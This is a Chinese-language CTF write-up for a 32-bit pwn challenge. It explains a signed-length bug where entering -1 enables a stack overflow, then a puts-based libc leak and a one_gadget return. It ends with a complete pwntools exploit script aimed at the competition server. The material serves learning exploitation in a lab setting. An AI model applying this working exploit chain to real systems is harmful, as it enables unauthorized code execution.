文章目录
- inverse
- main
- work
- read_int
- read_n
- 思路
- onegadget
- exp
第一次真正意义上独立在比赛中做出题目来了,距离真正意义接触CTF-PWN差不多正好两个月。但由于不知道靶场要自己开而且端口每次自己打开会改,交flag稍微晚了些(我太菜了)
inverse
main
work
这里很明显发现符号转换的bug,即nbytes对应有符号数为-1时可以造成溢出
read_int
将输入的字符转换为int类型(字符为负数也会转换)
read_n
往字符数组输入字符
思路
onegadget
ROPgadget
首先patchelf换库
然后通过输入字符-1使得绕过检查,随后-1对应0xffffffff(32位),再次read时造成溢出,构造payload,先将返回地址覆盖为puts函数的地址,然后下一个为work函数的地址(puts的返回地址),然后是puts的参数,为puts的got表的地址,然后第一次work造成puts地址泄露,(先通过one_gadget找到可用的gadget,最后选择0x6749f的,因为esi一般都是符合其要求的,然后eax比较好找对应的gadget,如上图)从而得到libc基地址,然后第二次work时同样输入字符-1,随后将返回地址覆盖为pop eax;ret的gadget的地址,然后是0,最后是onegadget的地址,最后成功getshell
exp
from pwn import*
#context(os="linux",arch="i386",log_level="debug")
s=remote("124.71.135.126",30043)
#s=process("./pwn")
f=ELF("./pwn")
libc=ELF("./libc-2.27.so")
#gdb.attach(s,"b main")
s.recvuntil(b"input world tag: ")
s.sendline(b"1")
s.sendline(b"-1")
s.recvuntil(b"leave me a msg:")
payload=b"a"*64+p32(f.sym["puts"])+p32(f.sym["work"])+p32(f.got["puts"])
#+f.got["puts"]
s.sendline(payload)
put_addr=u32(s.recvline()[0:4])
libc_base=put_addr-libc.sym["puts"]
system_addr=libc_base+0x6749f
payload=b"a"*64+p32(0x00024d37+libc_base)+p32(0)+p32(system_addr)
s.sendline(b"-1")
s.recvuntil(b"leave me a msg:")
s.sendline(payload)
# print(hex(u32(put_addr)))
s.interactive()
